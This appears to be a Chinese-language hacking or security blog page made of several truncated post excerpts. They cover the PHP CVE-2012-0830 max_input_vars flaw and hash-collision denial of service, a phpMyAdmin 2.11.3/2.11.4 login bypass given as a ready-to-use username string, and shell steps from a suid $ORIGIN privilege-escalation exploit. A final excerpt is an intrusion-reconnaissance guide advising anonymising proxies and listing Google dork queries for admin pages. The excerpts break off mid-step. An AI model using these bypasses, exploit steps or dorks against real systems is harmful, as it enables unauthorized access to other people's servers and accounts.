漏洞编号:CVE-2012-0830
漏洞版本:PHP 5.3.9及其他版本
漏洞描述:PHP在12月为哈希碰撞拒绝服务(CVE-2011-4885)(http://sebug.net/vuldb/ssvid-30001)提供的补丁引出了另一个严重的安全漏洞。
漏洞详情:
防止哈希碰撞的补丁在php.ini中引入了新的配置属性:
max_input_vars
此配置元素限制用于请求中使用的变量数量(如http://request.com/foo.php?a=1&b=2&c=3),默认设置为1000。 漏洞修补在php_variables.c代码中的php_reg[……]
关于http://www.nigesb.com/hash-vul.html这个漏洞,很多人说这个只是坑爹的本地漏洞,没有用,于是弄了个邪恶的东西出来证明一下:
工具就不对外发布了,发布DOS工具是要坐牢的。。。。[……]
PHP在5.4发布的时候, 引入了一个新的配置项:
max_input_vars
这个预防的攻击, 就是”通过调用Hash冲突实现各种语言的拒绝服务攻击漏洞”(multiple implementations denial-of-service via hash algorithm collision).
攻击的原理很简单, 目前很多语言, 使用hash来存储k-v数据, 包括常用的来自用户的POST数据, 攻击者可以通过构造请求头, 并伴随POST大量的特殊的”k”值(根据每个语言的Hash算法不同而定制), 使得语言底层保存POST数据的Hash表因为”冲突”(碰撞)而退化成链[……]
这个漏洞好像还蛮隐秘的,今天就说下吧
影响版本:
phpmyadmin 2.11.3
phpmyadmin 2.11.4
利用方式:
直接在phpmyadmin的用户名内填入:
‘localhost’@’@”
不用填入密码,可以直接登录,管理权限哦。
[……]
# 在/tmp下创建可控制的目录
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义
$ ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符
$ exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3 lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# 删除之前所创建的目[……]
一:入侵前的侦察。
首先打开无界代理(最新版是U995)或VPN(推荐用飞易VPN,但不免杀的,可以简单做一下免杀)再做如下工作:
第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆[……]
最新评论